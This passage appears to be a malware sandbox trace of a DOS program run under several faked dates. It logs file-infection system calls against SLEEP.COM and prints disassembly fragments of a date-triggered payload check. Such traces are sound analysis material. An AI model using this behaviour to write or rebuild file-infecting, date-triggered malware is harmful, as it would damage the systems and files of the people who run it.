2018-12-25T11:41:47.160548605Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:47.169686441Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:47.172356686Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:47.176284423Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:47.180788453Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:47.185344314Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:47.186987866Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:47.188923035Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:47.190037321Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:47.192707507Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:47.198882277Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:47.200638516Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:47.203142383Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:47.208025066Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:47.210956546Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:47.213565636Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:47.215807508Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:47.218343121Z 26 PC: 12bae | Set disk transfer address (See above)
2018-12-25T11:41:47.220471377Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1994,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":735,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:46.950110005Z 26 PC: 12bae | Set disk transfer address
2018-12-25T11:41:46.951851526Z 78 PC: 12ac9 | Find first file
2018-12-25T11:41:46.95803635Z 61 PC: 12ad4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:46.964565862Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:46.971002252Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:41:46.972630622Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:46.975109396Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:46.976306595Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-25T11:41:48.092502081Z 62 PC: 12b23 | Close file
2018-12-25T11:41:48.431342989Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-25T11:41:48.433592458Z 42 PC: 12b3f | Get date 0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
2018-12-25T11:41:48.440292717Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.442933843Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.449606221Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.464926429Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.466187083Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.468629732Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.470367991Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.472831131Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.56081461Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.564247227Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:48.566335879Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.568832434Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.575709937Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.581966521Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.583167054Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.58594888Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.587212297Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.590083618Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.683339456Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.685515655Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:48.687756275Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.691321387Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.697658077Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.703799182Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.705544743Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.708098467Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.709430756Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.712205791Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.802483316Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.811276446Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:48.814547419Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.817121246Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.823424743Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.829437354Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.831035951Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.833441789Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.834679894Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.837521869Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.008821258Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.011155697Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:49.014291792Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.017019142Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.023494078Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.030605989Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.032190198Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.034807694Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.03680588Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.264748282Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.444373864Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.447613144Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:49.449986202Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.452702351Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.460123035Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.476325296Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.477577957Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.480274059Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.481693042Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.484121802Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.533537864Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.53577591Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:49.537748581Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.540596067Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.546819251Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.549183752Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.551133993Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.55308448Z 42 PC: 12b3f | Get date (See above)
2018-12-25T11:41:49.555092453Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.557671571Z 26 PC: 12bae | Set disk transfer address (See above)
2018-12-25T11:41:49.558673685Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":735,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:47.958639118Z 26 PC: 12bae | Set disk transfer address
2018-12-25T11:41:47.960742085Z 78 PC: 12ac9 | Find first file
2018-12-25T11:41:47.967084247Z 61 PC: 12ad4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:47.973577291Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:47.979892719Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:41:47.982211492Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:47.985096529Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:47.986842328Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-25T11:41:49.06633245Z 62 PC: 12b23 | Close file
2018-12-25T11:41:49.444362615Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-25T11:41:49.44676484Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.450036441Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.454205065Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.458125489Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.459777591Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.462368364Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.463581707Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.467313777Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.53292574Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.535637151Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.539660952Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.548683347Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.555379368Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.557059379Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.561084608Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.562812048Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.565700528Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.723812779Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.725881376Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.728376192Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.735271354Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.741935565Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.743360137Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.74597619Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.747143706Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.748999518Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.774064493Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.778622839Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.781482103Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.788913435Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.795898987Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.797124586Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.799613217Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.800941186Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.803367798Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.846416952Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.849583221Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.852470579Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.859401905Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.866900471Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.868269847Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.871130168Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.873101741Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.890410601Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.914962912Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.917623124Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.920154957Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.926741576Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.933621667Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.934728424Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.937933462Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.940166613Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.943321826Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.971829618Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.973823963Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.975551078Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.97988383Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.982231938Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.983549365Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.984987376Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.98736261Z 26 PC: 12bae | Set disk transfer address (See above)
2018-12-25T11:41:49.988251306Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":735,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:48.154853832Z 26 PC: 12bae | Set disk transfer address
2018-12-25T11:41:48.156225324Z 78 PC: 12ac9 | Find first file
2018-12-25T11:41:48.163449641Z 61 PC: 12ad4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:48.171694426Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:48.179015179Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:41:48.187776267Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:48.190750686Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.192350273Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-25T11:41:48.207315314Z 62 PC: 12b23 | Close file
2018-12-25T11:41:48.217216352Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-25T11:41:48.220386853Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.224640039Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.232624267Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.240822788Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.243710348Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.247192444Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.249179914Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.252773422Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.262537404Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.26525368Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.268513755Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.276260525Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.283262644Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.284934484Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.288665007Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.290571013Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.293885291Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.303672287Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.307376461Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.310823141Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.31926864Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.326381913Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.328176132Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.332562187Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.334596542Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.337966621Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.347275317Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.35046735Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.353813145Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.361822912Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.3694612Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.371005097Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.374248616Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.377944376Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.380890845Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.389784231Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.393291722Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.396405281Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.403697411Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.411567966Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.41352862Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.416542862Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.418525137Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.428091785Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.437682528Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.440756193Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.444790687Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.452585522Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.461025143Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.463394655Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.466748092Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.468738364Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.473067882Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.481901092Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.484589001Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.487948909Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.495300625Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.498212111Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.500909131Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.503710544Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.506783139Z 26 PC: 12bae | Set disk transfer address (See above)
2018-12-25T11:41:48.509349131Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":735,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:48.262676061Z 26 PC: 12bae | Set disk transfer address
2018-12-25T11:41:48.264671728Z 78 PC: 12ac9 | Find first file
2018-12-25T11:41:48.272970916Z 61 PC: 12ad4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:48.280711201Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:48.288162693Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:41:48.290836494Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:48.294073872Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.295893142Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-25T11:41:48.311606928Z 62 PC: 12b23 | Close file
2018-12-25T11:41:48.321336653Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-25T11:41:48.324086034Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.32828538Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.335496529Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.34257874Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.344865622Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.347826634Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.349809702Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.352768818Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.362462218Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.365506326Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.369042597Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.375457331Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.382573207Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.383793067Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.38688273Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.388174476Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.39163872Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.400630105Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.402910116Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.40563719Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.413899814Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.420936867Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.422336969Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.425670295Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.426939892Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.42899843Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.434642556Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.441037063Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.442982982Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.447447406Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.452000156Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.453314796Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.455293727Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.457079884Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.45907297Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.464656158Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.466696141Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.468568938Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.472964327Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.478034473Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.479192078Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.481142219Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.48270779Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.48856922Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.494012804Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.495870686Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.498989668Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.506230828Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.513652842Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.515442674Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:48.51829216Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:48.519796643Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:48.522717917Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.531670415Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.534128448Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.537793801Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:48.545146218Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:48.548046373Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:48.550816555Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:48.55526677Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:48.558253916Z 26 PC: 12bae | Set disk transfer address (See above)
2018-12-25T11:41:48.564397856Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

